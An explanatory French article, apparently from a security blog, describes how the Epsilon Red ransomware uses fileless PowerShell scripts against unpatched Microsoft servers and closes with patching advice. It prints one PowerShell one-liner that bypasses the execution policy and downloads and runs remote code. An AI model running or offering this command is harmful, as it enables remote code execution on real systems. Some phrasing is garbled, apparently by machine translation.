Avez-vous déjà patché vos serveurs ?
Une nouvelle menace de ransomware , appelée Epsilon Red, cible les serveurs Microsoft non corrigés dans les centres de données d'entreprise. Nommé d'après un méchant peu connu des bandes dessinées Marvel, Epsilon Red a été récemment découvert par une société de cybersécurité appelée Sophos. Depuis leur découverte, les ransomwares ont attaqué de nombreuses organisations à travers le monde.
Un ransomware sans fichier « se cache » dans PowerShell
Les ransomwares sans fichier sont une forme de malware qui s'exécute en regroupant des logiciels légitimes. Les logiciels malveillants sans fichier basés sur PowerShell utilisent la capacité de PowerShell à se charger directement dans la mémoire de l'appareil. Cette fonctionnalité permet de protéger les logiciels malveillants dans les scripts PowerShell contre la détection.
Dans un scénario typique, lorsqu'un script s'exécute, il doit d'abord être écrit sur le lecteur du périphérique. Cela permet aux solutions de sécurité des points finaux de détecter les scripts. Étant donné que PowerShell est exclu des processus d'exécution de scripts standard, il peut contourner la sécurité des points de terminaison. De plus, l'utilisation du paramètre bypass dans un script PowerShell permet à un attaquant de contourner les restrictions des scripts réseau.
Voici un exemple de paramètre de contournement PowerShell :
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))
Comme vous pouvez le constater, la conception des paramètres de contournement de PowerShell est relativement simple.
En réponse, Microsoft a publié un correctif pour corriger une vulnérabilité d'exécution de logiciels malveillants à distance liée à PowerShell. Cependant, les correctifs ne sont efficaces que dans la mesure où ils sont utilisés. De nombreuses organisations ont assoupli leurs normes de mise à jour des correctifs, rendant ainsi leurs environnements vulnérables aux attaques. La conception d'Epsilon Red consiste à tirer parti de ce niveau de vulnérabilité.
La double utilité d'Epsilon Red
Étant donné qu'Epsilon Red est plus efficace contre les serveurs Microsoft non corrigés, le malware peut être utilisé comme ransomware et outil d'identification. Le fait qu'Epsilon réussisse ou non dans un environnement donne aux attaquants un meilleur aperçu des capacités de sécurité de leur cible.
Si Epsilon parvient à accéder à Microsoft Exchange Server, cela indique que l'organisation ne suit pas les meilleures pratiques de sécurité en matière de correctifs courants. Pour l'attaquant, cela montre avec quelle facilité le reste de l'environnement de la cible peut être compromis par Epsilon.
Epsilon Red utilise Obfuscation pour masquer sa charge utile. L'obscurcissement rend le code illisible et est utilisé dans les logiciels malveillants PowerShell pour éviter une lisibilité élevée des scripts PowerShell. Avec l'obscurcissement, les applets de commande d'alias PowerShell sont utilisées pour empêcher les logiciels antivirus d'identifier les scripts malveillants dans les journaux PowerShell.
Epsilon Red est le plus efficace contre les serveurs Microsoft non corrigés
Cependant, les scripts PowerShell obscurcis peuvent toujours être identifiés. Un signe courant d’une attaque imminente par PowerShell Script est la création d’un objet WebClient. Un attaquant créera un objet WebClient dans du code PowerShell pour établir une connexion externe vers une URL distante contenant du code malveillant.
Si une organisation est attaquée, la probabilité qu’elle dispose de mesures de sécurité suffisantes pour détecter les scripts PowerShell obscurcis est très faible. À l'inverse, si Epsilon Red ne parvient pas à pénétrer dans le serveur, cela indiquera à l'attaquant que le réseau de la cible peut déchiffrer rapidement le malware PowerShell, ce qui rendra l'attaque moins intéressante et plus précieuse.
Cyber-intrusion Epsilon Red
La fonctionnalité d’Epsilon Red est très simple. Le logiciel utilise une série de scripts Powershell pour infiltrer les serveurs. Ces scripts PowerShell sont numérotés de 1.ps1 à 12.ps1. La conception de chaque script PowerShell consiste à préparer un serveur de destination pour la charge utile finale.
Tous les scripts PowerShell dans Epsilon Red ont leur propre objectif. L'un des scripts PowerShell d'Epsilon Red est conçu pour résoudre les règles de pare-feu réseau de la cible. Un autre logiciel de cette série conçu pour désinstaller le logiciel antivirus de la cible .
Comme vous pouvez le deviner, ces scripts fonctionnent de manière synchronisée pour garantir qu'une fois la charge utile livrée, la cible ne peut pas arrêter rapidement sa progression.
Transmettre la charge utile
Une fois que les scripts PowerShell d'Epsilon ont laissé la place à leur charge utile finale, ils sont distribués sous forme d'extension, Red.exe . Lorsqu'il entre sur le serveur, Red.exe analysera les fichiers du serveur et créera une liste de chemins de répertoire pour chaque fichier qu'il détecte. Après avoir créé la liste, les processus enfants sont créés à partir du fichier principal du malware pour chaque chemin de répertoire de la liste. Ensuite, chaque sous-fichier du ransomware crypte un chemin de répertoire à partir du fichier de liste.
Une fois que tous les chemins de dossiers de la liste d'Epson ont été cryptés, un fichier .txt sera laissé pour informer la cible et énoncer la demande de l'attaquant. De plus, tous les nœuds de réseau accessibles connectés au serveur compromis seront alors compromis et la probabilité que des logiciels malveillants pénètrent dans le réseau peut augmenter.
Qui se cache derrière Epsilon Red ?
L'identité des attaquants derrière Epsilon Red est encore inconnue
L’identité des attaquants derrière Epsilon Red est encore inconnue. Certains indices pointent néanmoins sur l’origine des assaillants. Le premier indice est le nom du malware. Epsilon Red est un méchant X-Men avec une histoire d'origine russe.
Le deuxième indice réside dans la demande de rançon du fichier .txt que le code a laissé derrière lui. Cela ressemble à la note laissée par un gang de ransomwares appelé REvil. Toutefois, cette similitude n’indique pas que les assaillants étaient membres de ce gang. REvil exploite une opération RaaS (Ransomware as a service) dans laquelle les affiliés paient REvil pour accéder à ses logiciels malveillants.
Protégez-vous d’Epsilon Red
Jusqu’à présent, Epsilon Red a réussi à pénétrer des serveurs non corrigés. Cela signifie que l’une des meilleures protections contre Epsilon Red et les logiciels malveillants ransomware similaires consiste à garantir que votre environnement est correctement géré. De plus, disposer d’une solution de sécurité capable de déchiffrer rapidement les scripts PowerShell serait un ajout utile à votre environnement.